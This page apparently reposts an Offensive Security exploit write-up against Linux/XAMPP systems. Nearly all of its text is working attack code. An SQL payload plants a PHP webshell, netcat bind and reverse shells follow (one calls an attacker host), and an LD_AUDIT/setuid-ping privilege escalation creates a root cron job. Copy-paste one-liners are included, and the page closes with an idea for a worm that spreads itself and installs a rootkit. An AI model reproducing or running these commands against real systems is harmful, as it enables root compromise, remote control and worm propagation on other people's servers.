Debian

萌宠菠菠乐园
2024-10-26 13:11

Debian backdoor. --- DROP TABLE IF EXISTS `fm`; CREATE TABLE `fm` ( `fm` longblob ) TYPE=MyISAM; insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e); select fm from fm into dumpfile '/opt/lampp/htdocs/xampp_backup.php'; drop table fm; flush logs; --- Now you can connect to the server and create a connection with telnet, nc, write binary with perl -e ' print "/x41/x42/x43/x44"', echo -en '/x41/x42/x43/x44', ... If direct shell access isn't possible you can use phpcode to create your own binary with php fwrite: --- <?php $File = "/tmp/nc"; $Handle = fopen($File, 'w'); $Data = "/x41/x42/x43/x44"; fwrite($Handle, $Data); fclose($Handle); ?> --- Now use Bind-Shell: http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash in your webbrowser and connect to your shell $ nc victimip 9999 id uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) --- Now lets exploit the DSO vuln. You need umask 0 for correct rw-rw-rw creation of exploit /etc/cron.d/exploit $ umask 0 This is the shellscript for the cron.d entry. Bind-Shell: $ echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh Reverse-Shell: $ echo -e '/bin/nc localhost 8888 | /bin/bash' > /tmp/exploit.sh Now make your shellscript executable for cron: $ chmod u+x /tmp/exploit.sh Create rw-rw-rw file in cron directory using the setuid ping program: $ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping Launch every minute a suid root shell $ echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit Now you have a root shell every minute. $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) ------------------- | EXPLOIT oneline | ------------------- echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) ------------------------------ | EXPLOIT from webshell only | ------------------------------ http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping http://victimip/xampp_backup.php?c=echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) --------------------------------- | EXPLOIT from webshell oneline | --------------------------------- http://victimip/xampp_backup.php?c=echo -e '/bin/nc -l -p 79 -e /bin/bash' > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e '*/1 * * * * root /tmp/exploit.sh' > /etc/cron.d/exploit $ nc attackerip 79 id uid=0(root) gid=0(root) groups=0(root) --------- | IDEAS | --------- Looks like a wormable bug. The urlobfuscated (IDS/IPS) worm search for SQLI/BSQLI bugs or remote code execution bugs. Then the worm injects the evil url and do the same for other ips. It installs a rootkit-bot and the game is over. © Offensive Security 2010